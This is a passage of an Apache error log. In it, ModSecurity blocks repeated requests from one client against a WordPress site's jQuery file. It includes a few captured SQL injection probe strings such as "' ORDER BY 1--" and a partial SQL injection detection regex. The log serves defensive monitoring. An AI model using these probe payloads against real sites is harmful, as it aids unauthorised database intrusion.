"OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMzJVyS4wZaDPTA77mSQAAAAM"] [Sun Aug 18 00:55:25.026628 2024] [:error] [pid 26175:tid 140111094216448] [client 92.51.2.78:60890] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMzUusHEVNaz1QkYN6gAAAAMM"] [Sun Aug 18 00:55:25.601369 2024] [:error] [pid 25549:tid 140110926362368] [client 92.51.2.78:60892] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMzZVyS4wZaDPTA77mSgAAABc"] [Sun Aug 18 00:55:26.286977 2024] [:error] [pid 25549:tid 140111174412032] [client 92.51.2.78:60894] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMzpVyS4wZaDPTA77mSwAAAAI"] [Sun Aug 18 00:55:27.001040 2024] [:error] [pid 25550:tid 140111182804736] [client 92.51.2.78:60896] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMzvn89YewL24c7_QPxwAAAEE"] [Sun Aug 18 00:55:27.662231 2024] [:error] [pid 25551:tid 140111060645632] [client 92.51.2.78:60898] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: ' ORDER BY 1-- Bfjo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMzySCXpUXSc3dPnIVBAAAAIc"] [Sun Aug 18 00:55:28.468905 2024] [:error] [pid 26175:tid 140110993504000] [client 92.51.2.78:60902] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM0EusHEVNaz1QkYN6ggAAAM8"] [Sun Aug 18 00:55:28.970676 2024] [:error] [pid 26175:tid 140111182804736] [client 92.51.2.78:60904] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM0EusHEVNaz1QkYN6gwAAAME"] [Sun Aug 18 00:55:29.560149 2024] [:error] [pid 26175:tid 140111085823744] [client 92.51.2.78:60906] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM0UusHEVNaz1QkYN6hAAAAMQ"] [Sun Aug 18 00:55:30.458325 2024] [:error] [pid 25551:tid 140111052252928] [client 92.51.2.78:60912] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM0iSCXpUXSc3dPnIVBQAAAIg"] [Sun Aug 18 00:55:30.884554 2024] [:error] [pid 26175:tid 140110959933184] [client 92.51.2.78:60914] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM0kusHEVNaz1QkYN6hQAAANM"] [Sun Aug 18 00:55:31.578168 2024] [:error] [pid 26175:tid 140111077431040] [client 92.51.2.78:60916] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM00usHEVNaz1QkYN6hgAAAMU"] [Sun Aug 18 00:55:31.773976 2024] [:error] [pid 25550:tid 140111069038336] [client 92.51.2.78:60918] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM0_n89YewL24c7_QPyQAAAEY"] [Sun Aug 18 00:55:32.837325 2024] [:error] [pid 25551:tid 140111043860224] [client 92.51.2.78:60920] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM1CSCXpUXSc3dPnIVBgAAAIk"] [Sun Aug 18 00:55:33.429186 2024] [:error] [pid 25550:tid 140111043860224] [client 92.51.2.78:60922] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM1fn89YewL24c7_QPygAAAEk"] [Sun Aug 18 00:55:34.005968 2024] [:error] [pid 26175:tid 140111018682112] [client 92.51.2.78:60924] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM1kusHEVNaz1QkYN6hwAAAMw"] [Sun Aug 18 00:55:34.624900 2024] [:error] [pid 26175:tid 140111052252928] [client 92.51.2.78:60926] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: %' ORDER BY 1-- HXUx"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM1kusHEVNaz1QkYN6iAAAAMg"] [Sun Aug 18 00:55:35.270324 2024] [:error] [pid 26175:tid 140110943147776] [client 92.51.2.78:60928] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM10usHEVNaz1QkYN6iQAAANU"] [Sun Aug 18 00:55:35.793897 2024] [:error] [pid 26175:tid 140110968325888] [client 92.51.2.78:60930] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM10usHEVNaz1QkYN6igAAANI"] [Sun Aug 18 00:55:36.399229 2024] [:error] [pid 25550:tid 140111060645632] [client 92.51.2.78:60932] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM2Pn89YewL24c7_QPywAAAEc"] [Sun Aug 18 00:55:36.951951 2024] [:error] [pid 26175:tid 140110926362368] [client 92.51.2.78:60934] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM2EusHEVNaz1QkYN6iwAAANc"] [Sun Aug 18 00:55:37.316365 2024] [:error] [pid 26175:tid 140110917969664] [client 92.51.2.78:60936] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM2UusHEVNaz1QkYN6jAAAANg"] [Sun Aug 18 00:55:38.350864 2024] [:error] [pid 25549:tid 140111052252928] [client 92.51.2.78:60938] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM2pVyS4wZaDPTA77mTAAAAAg"] [Sun Aug 18 00:55:38.850876 2024] [:error] [pid 25550:tid 140110934755072] [client 92.51.2.78:60940] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM2vn89YewL24c7_QPzAAAAFY"] [Sun Aug 18 00:55:39.567885 2024] [:error] [pid 26175:tid 140111027074816] [client 92.51.2.78:60942] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM20usHEVNaz1QkYN6jQAAAMs"] [Sun Aug 18 00:55:40.228409 2024] [:error] [pid 26175:tid 140111191197440] [client 92.51.2.78:60944] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM3EusHEVNaz1QkYN6jgAAAMA"] [Sun Aug 18 00:55:40.906319 2024] [:error] [pid 26175:tid 140110993504000] [client 92.51.2.78:60946] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM3EusHEVNaz1QkYN6jwAAAM8"] [Sun Aug 18 00:55:41.275561 2024] [:error] [pid 26175:tid 140111182804736] [client 92.51.2.78:60948] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: ORDER BY 1-- gnhx"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM3UusHEVNaz1QkYN6kAAAAME"] [Sun Aug 18 00:55:42.279537 2024] [:error] [pid 25551:tid 140111094216448] [client 92.51.2.78:60950] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM3iSCXpUXSc3dPnIVBwAAAIM"] [Sun Aug 18 00:55:42.835950 2024] [:error] [pid 25551:tid 140111077431040] [client 92.51.2.78:60952] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM3iSCXpUXSc3dPnIVCAAAAIU"] [Sun Aug 18 00:55:43.419891 2024] [:error] [pid 26175:tid 140111085823744] [client 92.51.2.78:60954] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri 